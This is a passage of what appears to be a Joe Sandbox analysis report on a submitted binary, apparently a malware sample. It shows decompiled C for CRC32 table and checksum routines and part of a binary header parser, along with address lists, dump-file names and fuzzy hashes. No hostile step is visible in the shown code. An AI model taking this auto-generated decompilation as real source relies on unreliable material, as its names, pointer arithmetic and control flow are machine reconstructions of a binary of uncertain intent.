^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t83 = _t83 + 1;
				} while (_t83 < 0x100);
				_t43 = 0x41f3e4;
				_t84 = 0x1c0;
				do {
					_t3 = _t43 - 4; // 0x0
					_t43 = _t43 + 0x10;
					 *(_t43 + 0x3ec) =  *_t3 >> 0x00000008 ^  *(0x41f3e0 + ( *_t3 & 0x000000ff) * 4);
					_t7 = _t43 - 0x10; // 0x0
					 *(_t43 + 0x3f0) =  *_t7 >> 0x00000008 ^  *(0x41f3e0 + ( *_t7 & 0x000000ff) * 4);
					_t11 = _t43 - 0xc; // 0x0
					 *(_t43 + 0x3f4) =  *_t11 >> 0x00000008 ^  *(0x41f3e0 + ( *_t11 & 0x000000ff) * 4);
					_t15 = _t43 - 8; // 0x4192a0
					_t84 = _t84 - 1;
					 *(_t43 + 0x3f8) =  *_t15 >> 0x00000008 ^  *(0x41f3e0 + ( *_t15 & 0x000000ff) * 4);
				} while (_t84 != 0);
				 *0x41f3d0 = 0x419380;
				 *0x4213e0 = 0x419380;
				 *0x41f3cc = 0x4192a0;
				_t45 = E00414210();
				if(_t45 == 0) {
					 *0x4213e0 = 0x4192a0;
				}
				return _t45;
			}







                                                                                                                            0x00418c30
                                                                                                                            0x00418c32
                                                                                                                            0x00418cb8
                                                                                                                            0x00418cbf
                                                                                                                            0x00418cc0
                                                                                                                            0x00418ccc
                                                                                                                            0x00418cd1
                                                                                                                            0x00418cd7
                                                                                                                            0x00418cd7
                                                                                                                            0x00418cec
                                                                                                                            0x00418cef
                                                                                                                            0x00418cf5
                                                                                                                            0x00418d0a
                                                                                                                            0x00418d10
                                                                                                                            0x00418d25
                                                                                                                            0x00418d2b
                                                                                                                            0x00418d40
                                                                                                                            0x00418d41
                                                                                                                            0x00418d41
                                                                                                                            0x00418d53
                                                                                                                            0x00418d58
                                                                                                                            0x00418d5d
                                                                                                                            0x00418d63
                                                                                                                            0x00418d6a
                                                                                                                            0x00418d6c
                                                                                                                            0x00418d6c
                                                                                                                            0x00418d73

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7e8ad514181f1392663617d37fa5aac287f30e1f120c9b56e1846f19667033fd
                                                                                                                            • Instruction ID: 2418e866784658efeedf78a8b367f27fd94d949eb5011ce8ce344a4822a165bc
                                                                                                                            • Opcode Fuzzy Hash: 7e8ad514181f1392663617d37fa5aac287f30e1f120c9b56e1846f19667033fd
                                                                                                                            • Instruction Fuzzy Hash: 3A316177BA091A4BD70CCA28EC73AB96281E744345B88527EED5BCB3D1DF6C8841C64C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004192A1 Relevance: .1, Instructions: 70COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004192A1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				unsigned int _t59;
				signed char _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t73;
				signed int _t83;
				intOrPtr _t86;

				_t62 = __edx;
				_t42 = __ecx;
				_t65 = _a8;
				_t86 = _a12;
				if(_t65 != 0) {
					while((_t62 & 0x00000007) != 0) {
						_t83 =  *_t62 & 0x000000ff;
						_t62 = _t62 + 1;
						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t67 = _t65 + _t62;
						_a8 = _t67;
						_t69 = _t67 - 0x00000008 & 0xfffffff8;
						_t63 = _t62 - _t69;
						_t44 = _t42 ^  *(_t63 + _t69);
						_t59 =  *(_t63 + _t69 + 4);
						do {
							_t50 = _t59 & 0x000000ff;
							_t51 = _t59 & 0x000000ff;
							_t60 = _t59 >> 0x10;
							_t59 =  *(_t63 + _t69 + 0xc);
							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
							_t63 = _t63 + 8;
						} while (_t63 != 0);
						_t42 = _t44 ^  *(_t63 + _t69);
						_t62 = _t69;
						_t65 = _a8 - _t62;
						L7:
						while(_t65 != 0) {
							_t73 =  *_t62 & 0x000000ff;
							_t62 = _t62 + 1;
							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t42;
					}
				}
				goto L7;
			}

















                                                                                                                            0x004192a1
                                                                                                                            0x004192a4
                                                                                                                            0x004192a6
                                                                                                                            0x004192aa
                                                                                                                            0x004192b0
                                                                                                                            0x004192b6
                                                                                                                            0x004192be
                                                                                                                            0x004192c1
                                                                                                                            0x004192ca
                                                                                                                            0x004192ce
                                                                                                                            0x004192cf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004192cf
                                                                                                                            0x004192d4
                                                                                                                            0x004192da
                                                                                                                            0x004192dc
                                                                                                                            0x004192e3
                                                                                                                            0x004192e6
                                                                                                                            0x004192e8
                                                                                                                            0x004192eb
                                                                                                                            0x004192f0
                                                                                                                            0x004192f4
                                                                                                                            0x004192fe
                                                                                                                            0x00419308
                                                                                                                            0x0041931f
                                                                                                                            0x0041934b
                                                                                                                            0x0041934d
                                                                                                                            0x0041934d
                                                                                                                            0x00419352
                                                                                                                            0x00419355
                                                                                                                            0x0041935b
                                                                                                                            0x00000000
                                                                                                                            0x0041935d
                                                                                                                            0x00419361
                                                                                                                            0x00419364
                                                                                                                            0x0041936d
                                                                                                                            0x00419371
                                                                                                                            0x00419371
                                                                                                                            0x00419378
                                                                                                                            0x00419378
                                                                                                                            0x004192d4
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                            • Instruction ID: 6afb9c83622f7667f84253346451ad0de7d4bb496f1525738c8a557abb0a02b9
                                                                                                                            • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                            • Instruction Fuzzy Hash: E82107329006254BCB42CE6EE4845A7F3D2FBC536AF274B27ED9463291C638EC55C6A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041937B Relevance: .1, Instructions: 70COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041937B(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _t39;
				signed int _t41;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr _t76;

				_t63 = __edx;
				_t39 = __ecx;
				_t65 = _a4;
				_t76 = _a8;
				if(_t65 != 0) {
					while((_t63 & 0x00000007) != 0) {
						_t74 =  *_t63 & 0x000000ff;
						_t63 = _t63 + 1;
						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t66 = _t65 + _t63;
						_a4 = _t66;
						_t68 = _t66 - 0x00000008 & 0xfffffff8;
						_t64 = _t63 - _t68;
						_t41 = _t39 ^  *(_t64 + _t68);
						do {
							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
							_t64 = _t64 + 8;
						} while (_t64 != 0);
						_t39 = _t41 ^  *(_t64 + _t68);
						_t63 = _t68;
						_t65 = _a4 - _t63;
						L8:
						while(_t65 != 0) {
							_t70 =  *_t63 & 0x000000ff;
							_t63 = _t63 + 1;
							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t39;
					}
				}
				goto L8;
			}













                                                                                                                            0x0041937b
                                                                                                                            0x00419384
                                                                                                                            0x00419386
                                                                                                                            0x0041938a
                                                                                                                            0x00419390
                                                                                                                            0x00419396
                                                                                                                            0x0041939e
                                                                                                                            0x004193a1
                                                                                                                            0x004193aa
                                                                                                                            0x004193ae
                                                                                                                            0x004193af
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004193af
                                                                                                                            0x004193b4
                                                                                                                            0x004193ba
                                                                                                                            0x004193bc
                                                                                                                            0x004193c3
                                                                                                                            0x004193c6
                                                                                                                            0x004193c8
                                                                                                                            0x004193d0
                                                                                                                            0x00419426
                                                                                                                            0x0041942d
                                                                                                                            0x0041942d
                                                                                                                            0x00419432
                                                                                                                            0x00419435
                                                                                                                            0x0041943b
                                                                                                                            0x00000000
                                                                                                                            0x0041943d
                                                                                                                            0x00419441
                                                                                                                            0x00419444
                                                                                                                            0x0041944d
                                                                                                                            0x00419451
                                                                                                                            0x00419451
                                                                                                                            0x00419458
                                                                                                                            0x00419458
                                                                                                                            0x004193b4
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                                                            • Instruction ID: 4a8f15c690feeceaa45f30d21297364ae44fa9dd8c83136557fcfb88ab79e8e9
                                                                                                                            • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                                                            • Instruction Fuzzy Hash: A521257251442987C301DF2DE4986B7B3E1FFD8319FA78A2AD8928B280C638DC85D690
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F30E Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 452COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E0040F30E(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t255;
				signed int _t271;
				void* _t272;
				signed int _t278;
				intOrPtr _t282;
				signed int _t285;
				signed int _t304;
				signed int _t305;
				intOrPtr _t306;
				void* _t314;
				char* _t315;
				void* _t317;
				char* _t318;
				void* _t319;
				char* _t320;
				signed int _t322;
				signed int _t333;
				intOrPtr _t337;
				signed int _t342;
				signed int _t344;
				signed int _t349;
				void* _t354;
				int _t357;
				signed int _t358;
				intOrPtr* _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t373;
				intOrPtr _t391;
				signed int _t393;
				intOrPtr _t399;
				signed int _t401;
				signed int _t407;
				intOrPtr* _t415;
				intOrPtr _t417;
				intOrPtr* _t418;
				char _t420;
				void* _t425;
				signed int _t431;
				intOrPtr* _t436;
				void* _t441;
				void* _t443;

				E00418D80(E0041A4FC, _t443);
				_t441 = __ecx;
				E0040F16C(__ecx, __edx, _t443, __eflags, 0xb, 0);
				_t255 = E0040EB3D( *((intOrPtr*)(_t441 + 0x38)), __edx, __eflags);
				 *(_t443 - 0x4c) =  *(_t443 - 0x4c) & 0x00000000;
				 *(_t443 - 0x4b) =  *(_t443 - 0x4b) & 0x00000000;
				 *((intOrPtr*)(_t443 - 0x18)) = _t255;
				 *((intOrPtr*)(_t443 - 0x1c)) = 0;
				 *(_t443 - 4) = 0;
				E0040E913(_t443 - 0x50, __eflags, _t441,  *(_t443 + 8));
				_t436 =  *((intOrPtr*)(_t443 + 0xc));
				_t354 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
				 *((intOrPtr*)(_t436 + 4)) =  *((intOrPtr*)(_t443 - 0x18));
				 *(_t443 - 0x34) = _t354;
				E00410D2E(_t436 + 0x30,  *((intOrPtr*)(_t443 - 0x18)) + 1);
				E00410D5B(_t436 + 0x34,  *((intOrPtr*)(_t443 - 0x18)));
				E00410D2E(_t436 + 0x38,  *((intOrPtr*)(_t443 - 0x18)) + 1);
				E00410D2E(_t436 + 0x2c,  *((intOrPtr*)(_t443 - 0x18)) + 1);
				_t373 = 0;
				 *((intOrPtr*)(_t443 - 0x68)) = 0;
				 *((intOrPtr*)(_t443 - 0x64)) = 0;
				 *((intOrPtr*)(_t443 - 0x60)) = 0;
				 *(_t443 - 0x5c) = 0;
				 *((intOrPtr*)(_t443 - 0x58)) = 0;
				 *((intOrPtr*)(_t443 - 0x54)) = 0;
				_t450 =  *((intOrPtr*)(_t443 - 0x18));
				 *(_t443 - 4) = 2;
				 *((intOrPtr*)(_t443 - 0x30)) = 0;
				 *((intOrPtr*)(_t443 - 0x28)) =  *((intOrPtr*)(_t441 + 0x38));
				 *(_t443 - 0x2c) = 0;
				if( *((intOrPtr*)(_t443 - 0x18)) <= 0) {
					L63:
					_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) -  *(_t443 - 0x34) +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
					_t271 =  *(_t443 - 0x2c) << 2;
					 *((intOrPtr*)(_t271 +  *((intOrPtr*)(_t436 + 0x2c)))) =  *((intOrPtr*)(_t443 - 0x1c));
					 *((intOrPtr*)(_t271 +  *((intOrPtr*)(_t436 + 0x30)))) =  *((intOrPtr*)(_t443 - 0x30));
					_t431 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) -  *(_t443 - 0x34) +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
					 *(_t271 +  *((intOrPtr*)(_t436 + 0x38))) = _t431;
					_t272 = E00407AB8(_t436 + 0x3c, _t357);
					_t476 = _t357;
					if(_t357 != 0) {
						_t272 = memcpy( *(_t436 + 0x3c),  *(_t443 - 0x34), _t357);
					}
					E00403204(E00403204(_t272,  *(_t443 - 0x5c)),  *((intOrPtr*)(_t443 - 0x68)));
					 *(_t443 - 4) =  *(_t443 - 4) | 0xffffffff;
					E0040E883(_t443 - 0x50);
					_t358 = 0;
					E0040F16C(_t441, _t431, _t443, _t476, 0xc, 0);
					E00410D01(_t436 + 0x28,  *((intOrPtr*)(_t443 - 0x1c)));
					if( *((intOrPtr*)(_t443 - 0x1c)) > 0) {
						do {
							_t282 = E0040EA46( *((intOrPtr*)(_t441 + 0x38)));
							_t391 =  *((intOrPtr*)(_t436 + 0x28));
							 *((intOrPtr*)(_t391 + _t358 * 8)) = _t282;
							_t358 = _t358 + 1;
							 *(_t391 + _t358 * 8 - 4) = _t431;
						} while (_t358 <  *((intOrPtr*)(_t443 - 0x1c)));
					}
					goto L67;
				} else {
					while(1) {
						 *(_t443 - 0x3c) = _t373;
						 *(_t443 - 0x14) = _t373;
						_t431 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) - _t354 +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
						 *( *((intOrPtr*)(_t436 + 0x38)) +  *(_t443 - 0x2c) * 4) = _t431;
						_t285 = E0040EB3D( *((intOrPtr*)(_t443 - 0x28)), _t431, _t450);
						 *(_t443 - 0x10) = _t285;
						if(_t285 == 0 || _t285 > 0x40) {
							break;
						}
						 *(_t443 - 0x38) =  *(_t443 - 0x38) & 0x00000000;
						if(_t285 <= 0) {
							_t361 =  *((intOrPtr*)(_t443 - 0x28));
							L37:
							_t393 = 1;
							if(_t285 != _t393 ||  *(_t443 - 0x14) != _t393) {
								_t431 =  *(_t443 - 0x14);
								__eflags = _t431 - _t285 - 1;
								if(_t431 < _t285 - 1) {
									L76:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L77:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L78:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L79:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L80:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									break;
								}
								E00407ECE(_t443 - 0x68, _t431);
								_t431 =  *(_t443 - 0x10);
								E00407ECE(_t443 - 0x5c, _t431);
								 *(_t443 + 8) =  *(_t443 + 8) & 0x00000000;
								__eflags =  *(_t443 - 0x10) - 1;
								if(__eflags <= 0) {
									L48:
									_t304 =  *(_t443 - 0x14) -  *(_t443 - 0x10) - 1;
									__eflags = _t304 - 1;
									 *(_t443 - 0x24) = _t304;
									if(_t304 == 1) {
										L53:
										_t305 = 0;
										__eflags = 0 -  *(_t443 - 0x10);
										if(__eflags >= 0) {
											L59:
											if(__eflags == 0) {
												goto L80;
											}
											goto L60;
										} else {
											goto L54;
										}
										while(1) {
											L54:
											_t401 =  *(_t443 - 0x5c);
											__eflags =  *((char*)(_t305 + _t401));
											if( *((char*)(_t305 + _t401)) == 0) {
												break;
											}
											_t305 = _t305 + 1;
											__eflags = _t305 -  *(_t443 - 0x10);
											if(_t305 <  *(_t443 - 0x10)) {
												continue;
											}
											L58:
											__eflags = _t305 -  *(_t443 - 0x10);
											goto L59;
										}
										 *(_t443 - 0x3c) = _t305;
										goto L58;
									}
									 *(_t443 + 8) =  *(_t443 + 8) & 0x00000000;
									__eflags = _t304;
									if(__eflags <= 0) {
										goto L53;
									} else {
										goto L50;
									}
									while(1) {
										L50:
										_t314 = E0040EB3D(_t361, _t431, __eflags);
										__eflags = _t314 -  *(_t443 - 0x14);
										if(_t314 >=  *(_t443 - 0x14)) {
											goto L79;
										}
										_t315 = _t314 +  *((intOrPtr*)(_t443 - 0x68));
										__eflags =  *_t315;
										if( *_t315 != 0) {
											goto L79;
										}
										 *(_t443 + 8) =  *(_t443 + 8) + 1;
										 *_t315 = 1;
										__eflags =  *(_t443 + 8) -  *(_t443 - 0x24);
										if(__eflags < 0) {
											continue;
										}
										goto L53;
									}
									goto L79;
								} else {
									goto L43;
								}
								while(1) {
									L43:
									_t317 = E0040EB3D( *((intOrPtr*)(_t441 + 0x38)), _t431, __eflags);
									__eflags = _t317 -  *(_t443 - 0x14);
									if(_t317 >=  *(_t443 - 0x14)) {
										goto L78;
									}
									_t318 = _t317 +  *((intOrPtr*)(_t443 - 0x68));
									__eflags =  *_t318;
									if(__eflags != 0) {
										goto L78;
									}
									 *_t318 = 1;
									_t319 = E0040EB3D( *((intOrPtr*)(_t441 + 0x38)), _t431, __eflags);
									_t407 =  *(_t443 - 0x10);
									__eflags = _t319 - _t407;
									if(_t319 >= _t407) {
										goto L77;
									}
									_t431 =  *(_t443 - 0x5c);
									_t320 = _t319 + _t431;
									__eflags =  *_t320;
									if( *_t320 != 0) {
										goto L77;
									}
									 *(_t443 + 8) =  *(_t443 + 8) + 1;
									 *_t320 = 1;
									__eflags =  *(_t443 + 8) - _t407 - 1;
									if(__eflags < 0) {
										continue;
									}
									goto L48;
								}
								goto L78;
							} else {
								 *(_t443 - 0x3c) =  *(_t443 - 0x3c) & 0x00000000;
								 *(_t443 - 0x24) = _t393;
								L60:
								_t362 =  *(_t443 - 0x2c);
								_t306 =  *((intOrPtr*)(_t443 - 0x1c));
								 *((intOrPtr*)( *((intOrPtr*)(_t436 + 0x2c)) + _t362 * 4)) = _t306;
								_t399 =  *((intOrPtr*)(_t443 - 0x30));
								 *((intOrPtr*)(_t443 - 0x1c)) = _t306 +  *(_t443 - 0x10);
								 *((intOrPtr*)( *((intOrPtr*)(_t436 + 0x30)) + _t362 * 4)) = _t399;
								if( *(_t443 - 0x24) >  *_t436 - _t399) {
									E0040E966(_t399);
								}
								 *((intOrPtr*)(_t443 - 0x30)) =  *((intOrPtr*)(_t443 - 0x30)) +  *(_t443 - 0x24);
								 *((char*)( *((intOrPtr*)(_t436 + 0x34)) + _t362)) =  *(_t443 - 0x3c);
								_t363 = _t362 + 1;
								 *(_t443 - 0x2c) = _t363;
								if(_t363 <  *((intOrPtr*)(_t443 - 0x18))) {
									_t354 =  *(_t443 - 0x34);
